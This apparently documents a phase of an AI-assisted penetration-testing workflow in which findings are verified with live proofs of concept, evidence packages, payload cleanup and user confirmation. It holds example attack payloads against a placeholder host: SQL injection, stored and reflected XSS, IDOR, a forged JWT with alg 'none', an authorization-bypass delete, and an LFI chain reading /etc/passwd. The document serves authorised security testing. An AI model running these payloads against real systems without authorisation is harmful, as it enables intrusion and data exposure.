Phase 5: Verification & PoC Validation¶
Overview¶
Phase 5 ensures every reported vulnerability has a working, reproducible exploit and an evidence package strong enough to survive peer review, client delivery, and bug bounty triage. Findings without working exploits are rejected and not included in the final report.
Purpose: Eliminate false positives and confirm that every reported vulnerability is real and exploitable.
The Verification Principle¶
CRITICAL RULE: No exploit = No report. No real evidence = no report.
Every finding created in Phase 4 must be verified: 1. Test the exact exploit steps on the live target 2. Confirm the vulnerability is real (not false positive) 3. Ask user confirmation before final inclusion 4. If exploit fails → finding rejected
For pentests, verification is not complete until the finding has the full raw HTTP request and the full raw HTTP response with complete headers and complete body, plus representative screenshots whenever the strongest proof is visual or browser-driven. For bug bounty findings, keep the PoC as fast as possible, preferably curl, and record a video of the working PoC.
This approach ensures 100% finding accuracy and credibility with the client.
Verification Flow¶
graph TB
A["Phase 4 Complete<br/>N findings in findings/"] --> B["Categorize Findings<br/>Count by severity"]
B --> C{Findings < 6?}
C -->|Yes| D["Sequential Verify<br/>1 agent"]
C -->|No| E["Parallel Verify<br/>3 batches, 3 agents"]
D --> F["Build PoC<br/>curl command"]
E --> F
F --> G["Run Exploit<br/>Live target"]
G --> H{Exploit Works?}
H -->|Yes| I["Record Evidence<br/>Response, screenshot"]
H -->|No| J["Reject Finding<br/>Log false positive"]
I --> K["Cleanup<br/>Remove payloads"]
K --> L["User Confirmation<br/>Include in report?"]
J --> M["Phase 5 Complete<br/>Verified findings ready"]
L --> M
style A fill:#4a148c,color:#fff
style M fill:#4a148c,color:#fff
style I fill:#ab47bc,color:#fff
style K fill:#ab47bc,color:#fff
Borderline Second Opinion¶
Verification now includes a compact Codex second-opinion path for borderline findings.
This path is used when:
- evidence is real but not yet decisive
- the exploit behaves inconsistently
- Claude can reproduce some signal but not enough for a clean verdict
- the likely issue is high-value enough that a bounded second opinion is justified
Decision Split¶
| Step | Engine | Responsibility |
|---|---|---|
| Live exploit attempt | Claude | Run the PoC against the target |
| Borderline review | Codex finding_verifier |
Evaluate the compact evidence bundle |
| Final verdict | Claude | Decide promote, retest, or reject |
Codex does not replace live verification. It challenges assumptions and suggests whether the current evidence supports:
- promotion to verified finding
- downgrade to weak signal
- one more targeted retest
- full rejection as likely false positive
Compact Advisory Input¶
The borderline review is intentionally small and structured. It includes:
- target surface
- current hypothesis
- concise attempt summary
- evidence bundle
- constraints
This keeps Codex focused on the finding itself instead of the full engagement transcript.
Expected Outcome¶
The intended result is fewer false positives and fewer wasted Claude tokens on repeated self-checks of the same ambiguous case.
How Findings Are Verified¶
1. SQLi Verification¶
Safe verification technique: Use SLEEP() or BENCHMARK() to confirm time-based SQLi without extracting data
# Original vulnerable parameter
curl "https://api.example.com/api/v1/users?sort=name' OR '1'='1"
# Verification: time-based
curl -w "@curl-format.txt" \
"https://api.example.com/api/v1/users?sort=name' AND SLEEP(5) --"
# Expected: Response takes 5+ seconds
Acceptable evidence:
- ✅ Time delay in response (SLEEP confirms query execution)
- ✅ SELECT statement in error message (confirms SQL context)
- ✅ Different output with OR 1=1 (confirms injection)
- ❌ Just "error message" without confirming SQL injection
2. XSS Verification¶
Reflected XSS: Inject alert(document.domain) and verify JavaScript execution
# Test reflected XSS
curl "https://api.example.com/search?q=<script>alert(document.domain)</script>"
# Verify response contains the unescaped payload
grep -q "alert(document.domain)" response.html
Stored XSS: POST payload → GET to verify persistence
# Step 1: Store payload
curl -X POST "https://api.example.com/comments" \
-d "text=<img src=x onerror=alert(1)>"
# Step 2: Verify persistence
curl "https://api.example.com/comments/123"
grep -q "onerror=alert" response.html
DOM XSS: Use Playwright MCP or browser extension to verify: - Inspect DOM for payload - Check console for errors - Visual confirmation of JavaScript execution
3. IDOR Verification¶
Technique: Enumerate user IDs and verify access to another user's data
# Authenticated as User A (ID 1)
curl -H "Authorization: Bearer TOKEN_USER_A" \
"https://api.example.com/api/v1/users/2/profile"
# If User A can read User B's profile (ID 2), it's IDOR
Evidence: - ✅ Retrieved another user's PII (name, email, phone) - ✅ Modified another user's data - ✅ Deleted another user's resource - ❌ Got 200 response (but endpoint doesn't return sensitive data)
4. Broken Authentication Verification¶
JWT Algorithm Confusion:
# Original token
ORIGINAL_TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
# Craft token with alg: "none"
NONE_TOKEN="eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.payload."
# Verify it's accepted
curl -H "Authorization: Bearer $NONE_TOKEN" \
"https://api.example.com/api/v1/admin"
# If 200 response (not 401), authentication is broken
5. Authorization Bypass Verification¶
Test: Low-privilege user accessing high-privilege functions
# Authenticate as "User" role (lowest privilege)
curl -H "Authorization: Bearer USER_TOKEN" \
"https://api.example.com/api/v1/admin/users/delete?id=999"
# If 200/204 (user deleted), authz is bypassed
# If 403 (forbidden), authz is enforced
Evidence Collection¶
For each verified finding, collect:
1. Full HTTP Request (Pentest Standard)¶
POST /api/v1/users HTTP/1.1
Host: api.example.com
Authorization: Bearer eyJhbG...
Content-Type: application/json
{"email":"test' OR '1'='1","role":"admin"}
2. Full HTTP Response (Pentest Standard)¶
HTTP/1.1 200 OK
Content-Type: application/json
X-Request-Id: 8f3a1b2c
{"users":[{"id":1,"email":"admin@example.com","role":"admin"},...]}
Store the complete response by default. Do not truncate headers or body unless you are performing minimal redaction of secrets or non-essential sensitive data.
3. Response Indicator (What proves the vuln)¶
4. Baseline (What the response should be)¶
5. Representative Screenshot (When Relevant)¶
Capture a screenshot whenever the strongest proof is visual or browser-driven, for example: - XSS or stored XSS dialog / rendered payload - Authorization bypass visible in UI - Sensitive data exposure rendered in page context - Stored payload appearing for another role or another user
Screenshots must be representative, not decorative. A screenshot does not replace the raw HTTP evidence; it complements it.
6. Bug Bounty Only: Working-PoC Video¶
For bug bounty findings, record a video that shows:
- the real target
- the exact steps or the rapid curl PoC
- the exploit succeeding live
- the visible or observable impact
Bug bounty submissions without a working-PoC video are not submission-ready.
All collected in FINDING-NNN.md:
HTTP Response:
Response Indicator: Response contains admin users when accessed as regular user
Baseline: Should return 403 Forbidden or empty user list for non-admin users
For pentests, this exact evidence package must propagate into HedgeDoc/Outline notes and the generated `.docx` report. The report is not allowed to downgrade full HTTP evidence into prose-only summaries.
## Parallel Verification (6+ Findings)
When there are 6 or more findings, verify in parallel to save time:
```bash
# Batch 1 (agents 1-2): SQLi, XSS findings
# Batch 2 (agents 3-4): IDOR, Auth findings
# Batch 3 (agents 5-6): Logic, Infrastructure findings
# Run in parallel
claude -p < batch1.prompt > batch1-results.log &
claude -p < batch2.prompt > batch2-results.log &
claude -p < batch3.prompt > batch3-results.log &
wait
Batches consolidated after all complete.
Payload Cleanup (CRITICAL)¶
After evidence collection, ALL persistent payloads must be removed from the target:
Stored XSS Cleanup¶
# Payload was: <img src=x onerror=alert(1)>
curl -X PUT "https://api.example.com/comments/123" \
-d "text=Cleaned up payload"
# Verify removal
curl "https://api.example.com/comments/123" | grep -q "alert(1)"
# Should return: "No" (payload removed)
Applies to: - Stored XSS in comments, profiles, messages - Stored SSTI in templates - Stored CRLF in headers - Uploaded files (delete after screenshot)
Finding Record¶
{
"finding_id": "FINDING-001",
"cleanup_status": "cleaned",
"cleanup_evidence": {
"timestamp": "2026-03-13T14:35:00Z",
"verified_removed": true
}
}
User Confirmation Workflow¶
Before final inclusion in report, ask user for each finding:
Found: SQL Injection in /api/v1/users?sort=
Severity: HIGH
PoC: curl "https://api.example.com/api/v1/users?sort=name' AND SLEEP(5)"
Expected: Response delays 5+ seconds
Actual: Response delayed 5.2 seconds ✓
Include in report? (yes/no)
User can: - ✅ yes: Include in report - ❌ no: Exclude (e.g., "client wants to test this themselves") - 🔍 re-verify: Run exploit again - 📝 adjust: Change severity/description
Verification Failure Handling¶
If exploit fails:
Finding: IDOR on /api/v1/users/{id}
Expected: Can access user 999 as user 1
Attempted: curl -H "Authorization: Bearer TOKEN_1" "https://api.example.com/api/v1/users/999"
Result: HTTP 403 Forbidden (Access Denied)
Conclusion: User correctly denied access → NOT VULNERABLE (False Positive)
Action: Remove from report
Common False Positives¶
| Scenario | Issue | Solution |
|---|---|---|
IDOR on /users/{id} returns 403 |
Access control is working | False positive → remove |
| SQLi detected but returns same data | Query doesn't change results | Verify with time-based SQLi |
| XSS payload in response but HTML-escaped | Escaping prevents execution | False positive → remove |
| Auth bypass attempt rejected | Authorization properly enforced | False positive → remove |
Chain Detection¶
After verifying individual findings, /chain-findings correlates them into attack chains:
Example Chain:
├── Finding: SQLi on /api/v1/reports?sort=
├── Finding: LFI on /api/v1/reports/export?filename=
└── Chain: SQLi → extract admin email → LFI via filename injection → read /etc/passwd
Each chain gets a CHAIN-NNN.md file with execution steps.
Verification Statistics¶
After Phase 5: - Verified findings: X (with working exploits) - Rejected findings: Y (false positives) - Cleanup status: All persistent payloads removed - User confirmations: X/X (all approved)
Next Phase¶
After Phase 5 completes with all findings verified and cleaned up, proceed to Phase 6: Report to generate the professional penetration test report.